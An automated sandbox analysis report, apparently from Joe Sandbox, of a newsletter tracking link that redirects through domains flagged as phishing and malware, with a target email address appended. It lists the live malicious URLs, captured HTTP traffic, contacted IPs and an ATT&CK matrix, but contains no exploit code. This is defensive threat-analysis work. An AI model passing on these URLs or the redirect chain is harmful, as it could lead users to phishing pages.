Windows Analysis Report
https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zD

Overview

General Information

Sample URL: https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCw
Analysis ID: 1388680

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Creates files inside the system directory
URL contains potential PII (phishing indication)

Classification

  • System is w10x64
  • chrome.exe (PID: 3192 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,9153540945449359898,776365275202532557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6432 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.comAvira URL Cloud: detection malicious, Label: phishing
Source: https://djdhde.mypi.co/sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-postAvira URL Cloud: Label: malware
Source: https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3DAvira URL Cloud: Label: phishing
Source: https://djdhde.mypi.co/sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-postAvira URL Cloud: Label: malware
Source: https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.comSample URL: PII: marketing@virtualintelligencebriefing.com
Source: unknownHTTPS traffic detected: 23.33.136.127:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.33.136.127:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 23.33.136.127
Source: unknownTCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1Host: djdhde.mypi.coConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1Host: djdhde.mypi.coConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1c59/marketing@virtualintelligencebriefing.com HTTP/1.1Host: 95mc5.zal0.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://djdhde.mypi.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000B5F725C74D HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
Source: unknownDNS traffic detected: queries for: clients2.google.com
Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 07 Feb 2024 21:34:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FG%2BfyszLrrBCWercKIshC902%2FplEgx%2FXeKvH%2BixlHMYPY31RpWzM5YCxH68UPwHF80HBq%2Bkh69RWzjwmbw319zrhC5J9DkCMytc0PHC9ry5uKvfClRrSUj38vv77mrJOkg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 851ec1e36dff0d16-ATLalt-svc: h3=":443"; ma=86400
Source: chromecache_40.2.drString found in binary or memory: https://95mc5.zal0.com/1c59/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_3192_1908664628
Source: classification engineClassification label: mal56.win@19/2@16/9
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2016,i,9153540945449359898,776365275202532557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
  • Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
  • Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
  • Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
  • Privilege Escalation: Process Injection (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
  • Defense Evasion: Masquerading (1); Process Injection (1); Obfuscated Files or Information; Binary Padding
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
  • Discovery: System Service Discovery; Application Window Discovery; Query Registry; System Network Configuration Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
  • Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
  • Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (5); Ingress Tool Transfer (3)
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
  • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

Source | Detection | Scanner | Label | Link
https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D#/?/%23/?/marketing@virtualintelligencebriefing.com | 100% | Avira URL Cloud | phishing |
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://95mc5.zal0.com/1c59/marketing@virtualintelligencebriefing.com | 0% | Avira URL Cloud | safe |
https://95mc5.zal0.com/1c59/ | 0% | Avira URL Cloud | safe |
https://djdhde.mypi.co/sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post | 100% | Avira URL Cloud | malware |
https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D | 100% | Avira URL Cloud | phishing |
https://djdhde.mypi.co/sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
95mc5.zal0.com | 104.21.42.31 | true | false | | unknown
djdhde.mypi.co | 23.237.26.135 | true | false | | unknown
a.nel.cloudflare.com | 35.190.80.1 | true | false | | high
accounts.google.com | 74.125.138.84 | true | false | | high
link.mail.beehiiv.com | 104.18.69.40 | true | false | | unknown
www.google.com | 64.233.185.99 | true | false | | high
clients.l.google.com | 173.194.219.138 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.211.108 | true | false | | unknown
clients1.google.com | unknown | unknown | false | | high
clients2.google.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000B5F725C74D | false | | high
https://djdhde.mypi.co/sss/?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post | false | Avira URL Cloud: malware | unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 | false | | high
https://95mc5.zal0.com/1c59/marketing@virtualintelligencebriefing.com | false | Avira URL Cloud: safe | unknown
https://djdhde.mypi.co/sss?utm_source=capils-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post | false | Avira URL Cloud: malware | unknown
https://a.nel.cloudflare.com/report/v3?s=%2FG%2BfyszLrrBCWercKIshC902%2FplEgx%2FXeKvH%2BixlHMYPY31RpWzM5YCxH68UPwHF80HBq%2Bkh69RWzjwmbw319zrhC5J9DkCMytc0PHC9ry5uKvfClRrSUj38vv77mrJOkg%3D%3D | false | | high
https://link.mail.beehiiv.com/ls/click?upn=fBLT-2BLuQl3NwiQlY-2FUB-2F7yZK63rzVbOt6SRjyVrBIqFzFDo8M-2Fg4Bo4-2BO4hpom8z7ZLuxy2QxlYMgW1Gzy6pwCm23aez0vVyhBm7eCGwE0WdMbo1BXh-2BFRtbcaklbKh26FDy0n-2FdQ9t7RCwaH39WupxeBlLns-2FCYgl5f1ctJEhM-3DLmFo_AmeWD5ZsKC-2B3ZheZjnDpbUkAKgKl5WpTuOJCpyDqXRc8K-2FlFlJ4-2Bn1zDfmQE1bOIB5-2BmaBYS52bqAMuImdaBWt-2B7NcvDjHLSjDEqun4F40VGOju6f5eraMm-2BmA2cI4TwN5m-2FdXmsuh3AvB8I3hqCf5Su72C52AB82bXT78OFaGhLdykrKPYdzAmNePbUMkJfeZ1o1xXkpY533PpjggEufwqS96U2lHFtuM0AF0XznjCWvz2-2FAJxdv2yOU4Rja8sE1aVzAzUItssHkUW9tujzTKsHooxa0T1wqU-2BXsNw6IZYMBuNd2XQD3BPavL2FyKwgqOl-2BNlCpAsuRQyxxqbQ0sxmCsvEzI2nw166vYROKCjGmPPQtR1NyNiLpj317EtiqLrlvsktdS8N6bgTfK0t-2FA2HLcAR1clK9xdGWlVkoBfmmnRGIBboAePQ8ToZagwj4auB1PmTKZ9aQMtFdh-2FNJV17VPUH2ibgU2d8MV21fLKU-3D | false | Avira URL Cloud: phishing | unknown
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://95mc5.zal0.com/1c59/ | chromecache_40.2.dr | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.42.31 | 95mc5.zal0.com | United States | 13335 | CLOUDFLARENETUS | false
23.237.26.135 | djdhde.mypi.co | United States | 174 | COGENT-174US | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
173.194.219.138 | clients.l.google.com | United States | 15169 | GOOGLEUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
104.18.69.40 | link.mail.beehiiv.com | United States | 13335 | CLOUDFLARENETUS | false
74.125.138.84 | accounts.google.com | United States | 15169 | GOOGLEUS | false
64.233.185.99 | www.google.com | United States | 15169 | GOOGLEUS | false
IP
192.168.2.4
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1388680
Start date and time: 2024-02-07 22:33:39 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: browseurl.jbs
